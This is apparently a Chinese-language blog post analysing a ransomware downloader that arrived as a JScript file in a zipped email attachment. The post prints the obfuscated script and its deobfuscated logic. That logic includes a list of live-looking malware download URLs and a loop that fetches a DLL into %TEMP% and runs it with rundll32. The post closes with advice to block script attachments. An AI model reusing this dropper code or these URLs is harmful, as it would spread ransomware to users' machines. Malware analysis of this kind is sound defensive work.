目前勒索病毒流行趨勢很火,一般勒索就是通過郵件、網站掛馬、adobe flash漏洞等方式感染計算機,下載指定的病毒程序,再感染整個計算機,加密。
前天收到一份郵件,郵件地址來源陝西一台個人電腦,一看就是那種中了病毒,成了中繼場了。郵件內容看起來很正常,告訴我們的使用者,這個一個什麼什麼,請查收之類。
附件是一個zip的壓縮包,裡面有個js文件。
/*@cc_on
var Xm = '\x4b';
var Nf = '\x4c';
var Bv = '\x3a';
var MQz = 'a';
var WCr = '\x3c';
var NSs = '\x3b';
var AQc = '\x3e';
var HJr = '\x3d';
var YVd = '\x44';
var Yw = '\x45';
var ELv = '\x46';
var OZb = '\x47';
............
var Zo = "";
var YNb = 0;
do
{
Zo += Jo[YNb];
YNb += 1;
} while (YNb < Jo.length);
eval(Zo);
@*/
全程這種寫法,其實這都是障眼,\X表示是十六進制,在windows很多程序中是可以直接識別的,上面翻譯就對照ASCII編碼表就行。
如果你很懶,想省力,就開個程序(我用的vs2015),跑一下,得出zo的字符串。
function e(){
var _hsiyudgfustdg = "WScript";
var _c = "\%SystemRoot\%\\system32\\cmd.exe";
/*@cc_on var _87867t67t6gt = this[_hsiyudgfustdg]["Cre"+"ateOb"+"ject"](_hsiyudgfustdg+".Shell"); @*/
var _87g6sd5fg = _87867t67t6gt["Environment"]("SYSTEM");
var _dd = _87g6sd5fg("ComSpec");
if (_dd == _c) {return 1;}
else {this[this["_hsiyudgfustdg"]]["Quit"](1);};
}
e();
var La = "join" + "";
var DGz = "de" + "";
var NSy = "Co" + "";
var BEs = "ar" + "";
var Hx = "mCh" + "";
var Sa = "fro" + "";
var Tz = "gth" + "";
var Vv = "len" + "";
var TJm = "e" + "";
var Wg3 = "clos" + "";
var Az4 = "e" + "";
var Vf = "oFil" + "";
var VXy = "SaveT" + "";
var Pp = "t" + "";
var NOs = "eTex" + "";
var Bc = "writ" + "";
.................
跑出來的已經很好看了。至少有字符串了。它使用的就是vscript 宿主腳本語言,我們常說的vbs就是了
找到關鍵地方,翻譯出:(後面就別隨便找程序來跑執行點了undefined)
var IGv7=[Xw3+Ya+Yc + Kb6+SCv6+Tl3+KFg2+Ka6+Uo + OHi6+Ls4, ZCl + WBq+VKq + Sj3+SHj8 + Ch+Yy+Ac9+FKf3 + Pf+NZa2 + Fb9+Fb+Ke+JPy+Ey8, Hg6 + Sv+ATm5 + Xr1+Gs+IEl+UQk7+Pr+Kp0+EDr2+Cl, Hg6 + Sv+Cd+Zy+Pi4 + WXl+REi3+Ag + Oz0+Os+BYp2+Lf4, Hg6 + Sv+PKt2+Nc+LSk+Uu7+GPw+FOx8 + AUi+OPo+LTv + NGu8+Ne];
(其實這個IGv7是個數組來著)
var IGv7="http://sjunne.net/rzxh3,http://taladcaraudio.com/shl9lzvq,http://thisedu.com/t87wg07,http://onmunrebut.com/24hydk,http://clempurry.net/2v9r9d"
得到這幾個病毒下載器的網址。然後找到主執行程序:這基本上大家都可以看懂了。無非就是檢測有temp下面有沒有個指定的dll,沒有就去下載。然後用rundll32.exe 注入。
for (var i = 0; i < 10; i = i + (-3782 + 3783))
{
if (fso[FileExists](GLq))
{
var Nf = fso.GetFile("%TEMP%/Hosm8A4XkHIfA.dll");
var Nq = Nf.ShortPath;
El = Nq + ".txt";
'if (fso[XHo2 + Bt + ICq](El)) {this[Ij2 + HOf][Hq + Hk7](0);}
if (fso[filesexists](El))
{this[WScript][quit](0);}
}
try
{
if ((-3868 + 3868) == Ww)
{
var Gr = random(IGv7[lenthh], WBe);
MTm6[open](get, IGv7[Gr++ % IGv7[length]], false);
MTm6[send]();
while (MTm6.readystate < 4) WScript[sleep](100);
var Uv=WScript[CreateObject](Adodb.stream);
Uv[open]();
Uv[type]=XWe; 'xwe=1
Uv[write](MTm6[responseBody]);
Uv[position]=0;
Uv[savetofile]("%TEMP%/Hosm8A4XkHIfA", 2);
Uv[close]();
var CJf2=HIi("TEMP%/Hosm8A4XkHIfA");
CJf2=Kx1(CJf2);
if (CJf2[length] < (38 * 2 + 24) * 1024 || CJf2[length] > 230 * 1024)
{
continue;
}
OMb(GLq, CJf2);
Ww = 1;
}
var Nf = fso.GetFile("%TEMP%/Hosm8A4XkHIfA.dll");
var Nq = Nf.ShortPath;
MBi0[run](ELs + " " + Nq + ",qwerty 323");
WScript.Sleep(13494 + 6506);
}
catch (e) {WScript[Sleep](1000); continue;};
}
WScript.Quit(0);
後面我就沒繼續了。以上純屬愛好。
最好在郵件服務中屏蔽郵件附件中帶有.exe、wsf、vbs、ace、adom等腳本語言的內容,起到防範作用。
|
|
收藏
分享
讚
幹
分享
分享